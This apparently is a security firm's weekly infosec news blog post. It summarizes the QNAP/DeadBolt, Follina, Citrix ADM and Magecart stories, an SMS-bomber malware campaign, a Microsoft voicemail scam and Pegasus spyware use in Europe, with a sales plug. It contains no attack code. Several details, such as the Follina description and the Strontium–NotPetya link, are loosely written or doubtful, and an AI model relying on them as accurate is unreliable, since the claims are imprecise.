Weekly Infosec News Summary

Let’s examine the most recent cyber events that have occurred recently in different parts of the world.

Vulnerabilities & Attacks News

Critical PHP vulnerability opens QNAP NAS devices to remote attacks

This week in infosec news, a critical PHP vulnerability was discovered that exposes QNAP NAS devices to remote attacks.[1] A vulnerability in the web server component of a device’s firmware could allow an attacker to gain control of the device and access sensitive data. 

Customers are advised to update their QTS or QuTS hero operating systems, and the devices are also advised not to be connected to the internet.

Additionally, QNAP has recommended that customers contact QNAP Support for help if they cannot identify the ransom letter after updating the firmware and entering the obtained DeadBolt decryption key.

This shows once again, why it is important to regularly test your infrastructure for security issues. Luckily, it just so happens that your reading a blog post by the people that can help you. Check out our website for more infos on our penetration tests and vulnerability assessments. 😉

Russia exploits Microsoft Follina vulnerability against Ukraine

This week’s story comes from Ukraine, where Russian hackers have used the Follina flaw to access sensitive information.[2]

The Follina vulnerability, a few months back, now affects all versions of Microsoft Windows and can be exploited remotely.[3] This means that hackers can gain access to a system without prior knowledge or access to the target network. In the case of the Ukrainian attacks, the hackers could use the Follina flaw to deploy a backdoor called Poison Ivy, which allowed them to gain access to sensitive data.

These attacks underscore the need for organizations to patch their systems as soon as possible and implement robust security measures.

Vulnerability in Citrix ADM allows admin passwords to be reset

Recently, a critical Citrix ADM vulnerability was discovered that creates a means to reset admin passwords. 

A remote, unauthenticated user ran the risk of crashing a system via a denial-of-service (DoS) exploit and subsequently resetting admin credentials on the next reboot due to the inappropriate access control vulnerability (CVE-2022-27511).

The vulnerability could be exploited to force the “reset of the administrator password at the next device reboot, allowing an attacker with SSH [Secure Shell] access to connect with the default administrator credentials after the device has rebooted,” according to a Citrix advisory published last week. [4]

The vulnerability, which is present in the Citrix Application Delivery Controller and Gateway appliance, can be exploited by an unauthenticated attacker to gain administrative access to the appliance. While the patch for this vulnerability has been available for several weeks, it is unclear how many appliances are still vulnerable.

News Related to Threat Actors & Campaigns

Chinese hackers are distributing SMS bomber tools with malware inside

Chinese hackers are distributing an SMS bomber tool with malware hidden inside. The tool, designed to send many text messages to a specific phone number, includes a backdoor that allows the attacker to execute commands remotely on the victim’s device. The malware has been spreading via a phishing campaign that targets Android users in China. Once installed, the malware collects information about the victim’s device and sends it to a remote server. [5]

Insights into Magecart’s infrastructure reveal that the campaign is vast

Infosec researchers have discovered a new Magecart infrastructure that reveals the scale of ongoing Magecart campaigns.[6] This infrastructure consists of several servers that store stolen credit card data. The servers are located in different parts of the world, suggesting that the people behind Magecart use a distributed network to avoid detection. It proves how important it is for companies to be vigilant against Magecart attacks. It also shows how cybercriminals use increasingly sophisticated methods to steal sensitive information.

Other News Related to Business, Politics, and Culture

Cyberattacks on Ukraine highlighted by Microsoft

On Wednesday, Microsoft announced it had uncovered new evidence of Russian state-sponsored attacks on Ukrainian entities.Despite the news, tensions between Ukraine and Russia continue to rise, with the two countries locked in a conflict over the breakaway region of Crimea. In a blog post, Microsoft’s Threat Intelligence Center said it had discovered a group of hackers known as Strontium targeting government agencies, political parties, and media organizations in Ukraine. The group has also been linked to previous attacks on the Ukrainian power grid and the NotPetya malware outbreak. [8] Microsoft did not name any specific targets of the latest attacks but said they were “consistent with the group’s longstanding interest in Ukrainian affairs.” 

Earlier this week, Ukrainian security officials said they had uncovered a plot to disrupt the country’s financial system and critical infrastructure. 

Scammer steals Microsoft credentials with voicemail scam

Recent scams target Microsoft users to steal their credentials.[9] The scam starts with a voicemail from Microsoft stating that there has been a problem with the recipient’s account. The message then instructs the user to call a phone number to resolve the issue. However, the phone number belongs to a scammer who tries to trick the user into revealing their login information. Recently, there have been many scams targeting Microsoft users recently, so it’s essential to be vigilant when dealing with unsolicited calls or messages. If you suspect that you may have been a victim of this scam, be sure to change your password and enable two-factor authentication on your account as soon as possible.

Five European countries use Pegasus spyware, NSO confirms

The NSO Group has long been known for selling its spyware to government organizations worldwide. Now, new information has surfaced that suggests at least five European countries have used Pegasus spyware to target opponents and journalists. The software, designed to infect phones and collect data, was first used by the UAE to target human rights activists. It was then acquired by Mexico, where it was used to target journalists investigating corruption. [10]

This new information confirms what many infosec experts have long suspected: that governments worldwide are using NSO Group’s spyware to violate human rights.

We are witnessing an increase in cybercrime as we move further into the digital age. Every week, it seems like there’s a new story of some major data breach or cyber attack making headlines. This week was no different, as there were several important stories in the infosec world and these are just a few of the major stories from this week. Next week, we’ll get back to you with another updated news summary so be sure to add this blog to your watch list.